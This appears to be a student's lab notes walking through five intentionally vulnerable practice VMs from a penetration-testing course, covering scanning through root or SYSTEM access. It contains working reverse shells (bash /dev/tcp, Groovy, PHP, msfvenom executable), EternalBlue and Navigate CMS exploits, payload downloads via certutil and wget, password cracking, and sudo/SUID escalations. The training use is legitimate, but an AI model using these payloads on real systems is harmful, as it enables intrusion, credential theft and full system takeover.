Import all the VMs into VMWare Workstation Pro (free) or Virtualbox and change Network adapter to NAT.
O.S. - Windows 7
Credentials:
user:Password123!administrator:Password456!
mkdir -p ~/tcm/peh/blue/
cd ~/tcm/peh/blue/sudo nmap -p- -A -T4 192.168.31.132 -oA bluePORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:33:BE:EE (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: WIN-845Q99OO4PP; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-07-13T20:57:32
|_ start_date: 2024-07-13T20:49:44
|_nbstat: NetBIOS name: WIN-845Q99OO4PP, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:33:be:ee (VMware)
|_clock-skew: mean: 1h19m51s, deviation: 2h18m33s, median: -8s
| smb-os-discovery:
| OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: WIN-845Q99OO4PP
| NetBIOS computer name: WIN-845Q99OO4PP\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-07-13T16:57:32-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE
HOP RTT ADDRESS
1 0.68 ms 192.168.31.132MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Metasploit
msfconsole
search eternalblue
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.31.132
run[+] 192.168.31.132:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)use exploit/windows/smb/ms17_010_eternalblue
options
set RHOSTS 192.168.31.132
check
# Same as auxiliary/scanner/smb/smb_ms17_010 module
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.31.131 # Listening HOST/Kali
run
Manual exploit
cd ~/tcm/peh/blue/
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd ~/tcm/peh/blue/AutoBlue-MS17-010
pip install -r requirements.txt
cd shellcode
# Checker
python2 eternal_checker.py 192.168.31.132
❗ The machine can crash with this attack.
cd ~/tcm/peh/blue/AutoBlue-MS17-010/shellcode
./shell_prep.sh
# kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
# y
# LHOST for reverse connection:
# 192.168.31.131
# LPORT you want x64 to listen on:
# 8888
# LPORT you want x86 to listen on:
# 2222
# Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
# 1
# Type 0 to generate a staged payload or 1 to generate a stageless payload
# 0
cd ..
./listener_prep.sh
# Starts a listener# Open another Terminal
cd ~/tcm/peh/blue/AutoBlue-MS17-010/
python2 eternalblue_exploit7.py 192.168.31.132 shellcode/sc_all.bin
O.S. - Debian 10
Credentials:
root:tcm
mkdir -p ~/tcm/peh/academy
cd ~/tcm/peh/academy/sudo nmap -p- -A -T4 192.168.31.128 -oA academyPORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.31.131
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1000 1000 776 May 30 2021 note.txt
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c7:44:58:86:90:fd:e4:de:5b:0d:bf:07:8d:05:5d:d7 (RSA)
| 256 78:ec:47:0f:0f:53:aa:a6:05:48:84:80:94:76:a6:23 (ECDSA)
|_ 256 99:9c:39:11:dd:35:53:a0:29:11:20:c7:f8:bf:71:a4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:F2:81:D6 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.74 ms 192.168.31.128- Consider first attacks to ports
21,80.- Brute-forcing port
22(SSH) can be used to check if network detection is applied at client side, and for testing some default/weak credentials.
- Brute-forcing port
Visit 192.168.31.128
- Debian
- Apache 2.4.38 Server default webpage
- poor hygiene, etc
- http://192.168.31.128/phpmyadmin
- First do a version check for vulnerabilities
- Proceed with
ftpconnection
ftp 192.168.31.128
# use anonymous:anonymous user
# 230 Login successful.ls -lah
get note.txt- Try http://192.168.31.128/note.txt - Not found
# exit ftp
cat note.txt
Hello Heath !
Grimmie has setup the test website for the new academy.
I told him not to use the same password everywhere, he will change it ASAP. I couldn't create a user via the admin panel, so instead I inserted directly into the database with the following command:
INSERT INTO `students` (`StudentRegno`, `studentPhoto`, `password`, `studentName`, `pincode`, `session`, `department`, `semester`, `cgpa`, `creationdate`, `updationDate`) VALUES
('10201321', '', 'cd73502828457d15655bbd7a63fb0bc8', 'Rum Ham', '777777', '', '', '', '7.60', '2021-05-29 14:36:56', '');
The StudentRegno number is what you use for login.
Le me know what you think of this open-source project, it's from 2020 so it should be secure... right ?
We can always adapt it to our needs.
-jdelta10201321 - cd73502828457d15655bbd7a63fb0bc8
hash-identifier
# input cd73502828457d15655bbd7a63fb0bc8
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))- Crash md5 hash online
➡️ hashcat
- Inside the Kali VM,
hashcatwill use only the CPU for cracking the hash
locate rockyou.tx
nano hashes.txt # insert the hash string
# Run hashcat
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
10201321:student
➡️ dirb
dirb http://192.168.31.128➡️ ffuf
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.31.128/FUZZacademy [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 0ms]
phpmyadmin [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 0ms
[Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 0ms]
server-status [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 1ms]-
Navigate to http://192.168.31.128/academy
- Use
10201321:studentcredentials to login
- Use
-
Check pages source code for CMS versions
-
Try to upload a picture - upload successful
- Check the image URL - e.g. http://192.168.31.128/academy/studentphoto/peh-course-solo-icon.png
-
Try to upload a reverse shell, to abuse the file upload
- Upload via PHP
- Use GitHub - pentestmonkey/php-reverse-shell - copy the content of
php-reverse-shell.phpand create ashell.phpfile with that content - Set the
$ipequal to the Kali VM IP
nc -nvlp 1234- Upload the
shell.phpfile using the web image uploader- The file is already executed (if not navigate to its webpage)
- Reverse shell working
whoami
sudo -l # not working➡️ LinPEAS
# Kali VM
mkdir ~/tools
cd ~/tools
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
python3 -m http.server# Target reverse shell
cd /tmp
wget http://192.168.31.131:8000/linpeas.sh
# the file will be copied to the target machine
# Run LinPEAS
chmod +x linpeas.sh
./linpeas.sh
- Check for interesting data
* * * * * /home/grimmie/backup.sh
/var/www/html/academy/admin/includes/config.php:$mysql_password = "My_V3ryS3cur3_P4ss";cat /var/www/html/academy/admin/includes/config.php
<?php
$mysql_hostname = "localhost";
$mysql_user = "grimmie";
$mysql_password = "My_V3ryS3cur3_P4ss";
$mysql_database = "onlinecourse";
$bd = mysqli_connect($mysql_hostname, $mysql_user, $mysql_password, $mysql_database) or die("Could not connect database");
?>cat /etc/passwd
grimmie:x:1000:1000:administrator,,,:/home/grimmie:/bin/bash# Kali
ssh grimmie@192.168.31.128
# Paste My_V3ryS3cur3_P4ss password
grimmie@academy:~$
sudo -l
history
cat /home/grimmie/backup.sh
#!/bin/bash
rm /tmp/backup.zip
zip -r /tmp/backup.zip /var/www/html/academy/includes
chmod 700 /tmp/backup.zip
crontab -l
# no crontab for grimmie
crontab -u root -l
# must be privileged
systemctl list-timers➡️ pspy - Monitor linux processes without root permissions
- Download
pspy64and move it into the~/toolsdir where Python HTTP server is running
# Target
cd /tmp
wget http://192.168.31.131:8000/pspy64
chmod +x pspy64
./pspy64
# Wait for the backup.sh to run
- Run a bash reverse shell one liner
# Kali VM
nc -nvlp 8081
# Target
# Insert the one liner reverse shell into the backup.sh script
cd
nano backup.sh
bash -i >& /dev/tcp/192.168.31.131/8081 0>&1- Since the script will run as
rootuser's cronjob, root shell will be executed
O.S. - Debian 10
Credentials:
root:tcm
sudo arp-scan -l
# Dev IP 192.168.31.130
mkdir -p ~/tcm/peh/dev
cd ~/tcm/peh/dev/sudo nmap -p- -A -T4 192.168.31.130 -oA devPORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 bd:96:ec:08:2f:b1:ea:06:ca:fc:46:8a:7e:8a:e3:55 (RSA)
| 256 56:32:3b:9f:48:2d:e0:7e:1b:df:20:f8:03:60:56:5e (ECDSA)
|_ 256 95:dd:20:ee:6f:01:b6:e1:43:2e:3c:f4:38:03:5b:36 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Bolt - Installation error
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 39417/tcp mountd
| 100005 1,2,3 48134/udp mountd
| 100005 1,2,3 48315/tcp6 mountd
| 100005 1,2,3 49884/udp6 mountd
| 100021 1,3,4 32999/tcp6 nlockmgr
| 100021 1,3,4 37761/tcp nlockmgr
| 100021 1,3,4 49693/udp6 nlockmgr
| 100021 1,3,4 55683/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs 3-4 (RPC #100003)
8080/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: PHP 7.3.27-1~deb10u1 - phpinfo()
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
37761/tcp open nlockmgr 1-4 (RPC #100021)
39417/tcp open mountd 1-3 (RPC #100005)
47921/tcp open mountd 1-3 (RPC #100005)
56093/tcp open mountd 1-3 (RPC #100005)
MAC Address: 00:0C:29:B6:91:5C (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.70 ms 192.168.31.130- http://192.168.31.130/
- Bolt
/var/www/html/
- http://192.168.31.130:8080/
- PHP info page - information disclosure
PHP Version 7.3.27-1~deb10u1
# Port 80
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.31.130/FUZZ
public [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 2ms]
src [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 4ms]
app [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 6ms]
vendor [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 1ms]
extensions [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 1ms]
server-status [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 2ms]
# Port 8080
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.31.130:8080/FUZZ
dev [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 3ms]
server-status [Status: 403, Size: 281, Words: 20, Lines: 10, Duration: 1ms]- Navigate to each found directory
showmount -e 192.168.31.130
/srv/nfs 172.16.0.0/12,10.0.0.0/8,192.168.0.0/16sudo mkdir /mnt/dev
sudo mount -t nfs 192.168.31.130:/srv/nfs /mnt/dev
cd /mnt/dev
ls
sudo unzip save.zip
Archive: save.zip
[save.zip] id_rsa password:
cp /mnt/dev/* ~/tcm/peh/dev
chmod 600 ~/tcm/peh/dev/id_rsa➡️ fcrackzip
sudo apt install fcrackzipfcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt save.zip
found file 'id_rsa', (size cp/uc 1435/ 1876, flags 9, chk 2a0d)
found file 'todo.txt', (size cp/uc 138/ 164, flags 9, chk 2aa1)
PASSWORD FOUND!!!!: pw == java101
sudo unzip save.zip
# use java101 for password
cat todo.txt
- Figure out how to install the main website properly, the config file seems correct...
- Update development website
- Keep coding in Java because it's awesome
jpssh -i id_rsa jp@192.168.31.130
# needs passworddatabase:
driver: sqlite
databasename: bolt
username: bolt
password: I_love_java- Navigate to the BoltWire application http://192.168.31.130:8080/dev/
searchsploit boltwire
BoltWire 3.4.16 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities | php/webapps/36552.txt
BoltWire 6.03 - Local File Inclusion | php/webapps/48411.txt- Use the
Local File Inclusionvulnerability, that allows to expose files running on a server- LFI - Steps to Reproduce:
- Using HTTP GET request browse to the following page, whilst being authenticated user.
- Create and account and login
- LFI - Steps to Reproduce:
/index.php?p=action.search&action=../../../../../../../etc/passwd
- The user is
jeanpaul
cd ~/tcm/peh/dev
ssh -i id_rsa jeanpaul@192.168.31.130
# Enter passphrase for key 'id_rsa':
# Try the Database found password
# I_love_java
jeanpaul@dev:~$
sudo -l
# /usr/bin/zip can be run as elevated privileges
- Abuse
sudo /usr/bin/zipto escalate torootuser
➡️ GTFO Bins
- Check zip - GTFOBins
- look for
Sudo- If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
- look for
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
id
cd /root
cat flag.txt
O.S. - Windows 10
Credentials:
- Low Privilege User -
butler:JeNkIn5@44- Admin -
administrator:A%rc!BcA!
sudo arp-scan -l
# Butler IP 192.168.31.133
mkdir -p ~/tcm/peh/butler
cd ~/tcm/peh/butler/sudo nmap -p- -A -T4 192.168.31.133 -oA butlerPORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
7680/tcp open pando-pub?
8080/tcp open http Jetty 9.4.41.v20210516
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.41.v20210516)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:06:23:B3 (VMware)
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10 1709 - 1909
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: BUTLER, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:06:23:b3 (VMware)
|_clock-skew: 8h59m49s
| smb2-time:
| date: 2024-07-14T19:54:50
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
TRACEROUTE
HOP RTT ADDRESS
1 0.65 ms 192.168.31.133-
Navigate to http://192.168.31.133:8080
-
Focus on Login into the Jenkins app
- try default credentials (
admin:password) - not working - brute-force with Metasploit or BurpSuite
- try default credentials (
Intercept the login request and send it to the Intruder.
- Use
Cluster bombattack type - Set the payloads lists and start the attack
jenkins:jenkins is a valid login.
- Disable proxy
- Login with
jenkins:jenkins- search for code execution attacks: e.g.
jenkins script console exploit - Abusing Jenkins Groovy Script Console to get Shell | by Nishant Sharma | Pentester Academy Blog
- search for code execution attacks: e.g.
- From the Manage Jenkins / Script Console, use Pure Groovy/Java Reverse Shell to get a reverse shell
# Kali VM
nc -nvlp 8044# Script Console - run
String host="192.168.31.131";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
whoami
systeminfo
OS Version: 10.0.19043 N/A Build 19043➡️ WinPEAS
# Kali VM
cd ~/tools
wget https://github.com/peass-ng/PEASS-ng/releases/download/20240714-cd435bb2/winPEASx64.exe
mv winPEASx64.exe winpeas.exe
python3 -m http.server 80# Target reverse shell
cd c:\Users\butler
certutil.exe -urlcache -f http://192.168.31.131/winpeas.exe winpeas.exe
# the file will be copied to the target machine
# Run LinPEAS
winpeas.exe- Look for useful (red color) information, quick wins for privilege escalation
Unquoted service paths
- Unquoted Service Paths | Red Team Notes
- Abuse misconfigured services, possible when path the the service is not quoted and there are spaces in the path
WiseBootAssistant(WiseCleaner.com - Wise Boot Assistant)[C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe] - Auto - Running - No quotes and Space detected
YOU CAN MODIFY THIS SERVICE: AllAccess
File Permissions: Administrators [AllAccess]
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\Wise\Wise Care 365 (Administrators [AllAccess])- Drop an exploit binary into the
C:\Program Files (x86)\Wise\directory
# Generate an exploit
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.31.131 LPORT=7777 -f exe > Wise.exe
python3 -m http.server 80
# New terminal
nc -nvlp 7777# Target reverse shell
cd C:\Program Files (x86)\Wise\
certutil.exe -urlcache -f http://192.168.31.131/Wise.exe Wise.exe
# Stop the running service
sc stop WiseBootAssistant
sc query WiseBootAssistant
sc start WiseBootAssistant- Reverse shell as
system
O.S. - Debian 10
Credentials:
root:tcm
sudo arp-scan -l
# Butler IP 192.168.31.129
mkdir -p ~/tcm/peh/blackpearl
cd ~/tcm/peh/blackpearl/sudo nmap -p- -A -T4 192.168.31.129 -oA blackpearlPORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 66:38:14:50:ae:7d:ab:39:72:bf:41:9c:39:25:1a:0f (RSA)
| 256 a6:2e:77:71:c6:49:6f:d5:73:e9:22:7d:8b:1c:a9:c6 (ECDSA)
|_ 256 89:0b:73:c1:53:c8:e1:88:5e:c3:16:de:d1:e5:26:0d (ED25519)
53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u5 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u5-Debian
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
MAC Address: 00:0C:29:35:E9:A7 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.93 ms 192.168.31.129- Navigate to http://192.168.31.129
- nginx default page
- Proceed with some directory busting
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.31.129/FUZZ
secret [Status: 200, Size: 209, Words: 31, Lines: 9, Duration: 13ms]- Download the http://192.168.31.129/secret file
➡️ dnsrecon
dnsrecon -r 127.0.0.0/24 -n 192.168.31.129 -d test
[*] Performing Reverse Lookup from 127.0.0.0 to 127.0.0.255
[+] PTR blackpearl.tcm 127.0.0.1
[+] 1 Records Found- Add
blackpearl.tcmto Kali/etc/hosts
sudo nano /etc/hosts
# Add
192.168.31.129 blackpearl.tcm- Navigate to http://blackpearl.tcm
- phpinfo webpage
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://blackpearl.tcm/FUZZ
navigate [Status: 301, Size: 185, Words: 6, Lines: 8, Duration: 0ms]
[Status: 200, Size: 86790, Words: 4212, Lines: 1040, Duration: 6ms]- Navigate to http://blackpearl.tcm/navigate
- Navigate CMS v2.8
- Google for
navigate cms exploit
This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8 and prior, to bypass authentication. The module then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations. Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely. This module was tested against Navigate CMS 2.8.
msfconsole
search navigate cms
use exploit/multi/http/navigate_cms_rce
set rhosts 192.168.31.129
set vhost blackpearl.tcm
show targets
run# meterpreter >
shell
whoami- Generate a TTY Shell
which python
/usr/bin/python
python -c 'import pty; pty.spawn("/bin/bash")'
# Kali
cd ~/tools
python3 -m http.server 80# Target reverse shell
cd /tmp
wget http://192.168.31.131/linpeas.sh- Look for username and password, bottom up (red, yellow stuff)
# List owned files with SUID permissions
find / -type f -perm -4000 2>/dev/null/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/php7.3
/usr/bin/su
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/gpasswdIf the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.
This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.
/usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"
# This will run /bin/sh as root userwhoami
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
cd /root
cat flag.txt
cat /etc/shadow
...
🔗 For more in depth Privilege Escalation, check TCM courses here: